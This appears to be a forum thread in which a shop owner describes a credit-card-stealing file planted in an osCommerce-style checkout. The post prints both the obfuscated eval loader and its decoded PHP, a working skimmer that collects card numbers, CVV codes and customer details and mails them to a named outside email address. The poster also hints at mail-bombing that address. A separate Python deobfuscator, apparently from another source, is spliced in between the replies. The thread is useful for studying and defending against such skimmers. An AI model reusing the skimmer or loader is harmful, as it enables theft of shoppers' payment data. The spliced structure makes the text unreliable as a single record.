
graith

Credit Card Number stealing inc_lib.php


I found this code in checkout_confirmation.php

 

require(DIR_WS_INCLUDES . 'inc_lib.php');

 

which looks like this.

 

<?
function d($s,$k=''){if($k==''){for($i=0;$i<strlen($s);$i){$d.=chr(hexdec(substr($s,$i,2)));$i=(float)($i)+2;}return $d;}else{$r='';$f=d('6261736536345f6465636f6465');$u=$f('Z3ppbmZsYXRl');$s=$u($f($s));for($i=0;$i<strlen($s);$i++){$c=substr($s,$i,1);$kc=substr($k,($i%strlen($k))-1,1);$c=chr(ord($c)-ord($kc));$r.=$c;}return $r;}}eval(d("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",864930819));
?>

 

Decoding it turns it into this:

 

if((isset($v) AND $v==0) OR (isset($t) AND $t==false)){die('');}
// Card details typed into the checkout form
$first_name = $_POST['cc_owner'];
$ccnum = $_POST['cc_number'];
$ccstart1 = $_POST['cc_start_month'];
$ccstart2 = $_POST['cc_start_year'];
$cvv2 = $_POST['cc_ccv'];
$exp1 = $_POST['cc_expires_month'];
$exp2 = $_POST['cc_expires_year'];
$issue = $_POST['cc_issue'];
// Billing and contact details taken from the order object
$add = tep_address_format($order->billing['format_id'], $order->billing, 1, ' ', '---');
$phone = $order->customer['telephone'];
$email = $order->customer['email_address'];
$street = $order->customer['street_address'];
$city = $order->customer['city'];
$state = $order->customer['state'];
$zip = $order->customer['postcode'];
$ip = $_SERVER["REMOTE_ADDR"];

$msg = "Email: $email\nstreet: $street\ncity: $city\nState: $state\nzip: $zip\nPhone: $phone
Name: $first_name\nCcnumber: $ccnum\nExpdate: $exp1/$exp2\nCVV: $cvv2\nStart: $ccstart1/$ccstart1\nIssue: $issue
IP: $ip\nAddress: $add";

// Everything collected above is mailed out to the attacker's address
$to="albozuk@gmail.com";
$subj = "HEY BABY";
$from ="From: news@asc.com";
mail ($to, $subj, $msg, $from);

 

 

Its job is to email the credit card details to the email address albozuk@gmail.com with the subject "HEY BABY".

 

It'd be a great shame if he got 10,000 emails from news@asc.com with that subject or if that email address was submitted to some obnoxious email feed.

 

I've no idea how the site was hacked. It's a version of CRE Loaded and the admin directory is password protected. Every file had its date and time stamp set to November 2007 so we can't trace exactly when it was done. We've turned off accepting credit card payment and we'll have to use a payment provider instead.

 

Graith
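The layered decoder in the planted inc_lib.php (hex-decoded function names, then base64_decode, gzinflate and a rotating key subtraction) reimplemented in Python, as an added example for anyone who wants to recover such a payload for analysis without handing it to eval(); this is not code from the thread or from CRE Loaded. Because the real blob is not reproduced above, the example builds its own constructed sample with the inverse transform, and it assumes PHP coerces the integer key 864930819 to the string "864930819" inside strlen()/substr().

```python
import base64
import zlib

# Layer 1 of the planted inc_lib.php: d($s) with no key is a plain hex
# decoder, used only to hide the names of the real decoding functions.
def hex_decode(hex_str: str) -> str:
    return bytes.fromhex(hex_str).decode("latin-1")

def hidden_function_names() -> tuple:
    """The two function names the first layer conceals."""
    f = hex_decode("6261736536345f6465636f6465")          # -> "base64_decode"
    u = base64.b64decode("Z3ppbmZsYXRl").decode("ascii")  # -> "gzinflate"
    return f, u

def key_char(key: str, i: int) -> int:
    # PHP: substr($k, ($i % strlen($k)) - 1, 1). Whenever i % len == 0 the
    # index is -1, so PHP returns the LAST key character; Python's negative
    # indexing reproduces that off-by-one exactly.
    return ord(key[(i % len(key)) - 1])

def deobfuscate(blob: str, key: str) -> str:
    """Layer 2 of d($s, $k): base64_decode -> gzinflate -> per-byte key
    subtraction. gzinflate is raw DEFLATE, hence wbits=-15. PHP's chr()
    wraps out-of-range values modulo 256, matched here by & 0xFF."""
    raw = zlib.decompress(base64.b64decode(blob), -15)
    return bytes((c - key_char(key, i)) & 0xFF for i, c in enumerate(raw)).decode("latin-1")

def obfuscate(payload: str, key: str) -> str:
    """Inverse of deobfuscate; exists only to build a constructed sample,
    since the real blob is not reproduced here. ASCII payloads only."""
    shifted = bytes((ord(c) + key_char(key, i)) & 0xFF for i, c in enumerate(payload))
    co = zlib.compressobj(9, zlib.DEFLATED, -15)
    return base64.b64encode(co.compress(shifted) + co.flush()).decode("ascii")

# Constructed stand-in for the eval()'d blob. Assumption: the PHP passes the
# key as the integer 864930819, which strlen()/substr() coerce to this string.
KEY = "864930819"
SAMPLE_PAYLOAD = "if(isset($t) AND $t==false){die('');}$ccnum=$_POST['cc_number'];"
SAMPLE_BLOB = obfuscate(SAMPLE_PAYLOAD, KEY)

if __name__ == "__main__":
    print("hidden names:", hidden_function_names())
    print("recovered:", deobfuscate(SAMPLE_BLOB, KEY))
```

To use it on a real file, paste the first string argument of eval(d(...)) as the blob and the second argument, as a string, as the key; the recovered text is the PHP that would have been executed.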


Brian,

 

Unless your site was PCI DSS compliant, you should not have been accepting credit cards anyway. Ensure your site is V2.2 RC2a and has ALL of the security patches and suggested Security Contributions installed to avoid any future security breaches.

 

 

 

Chris


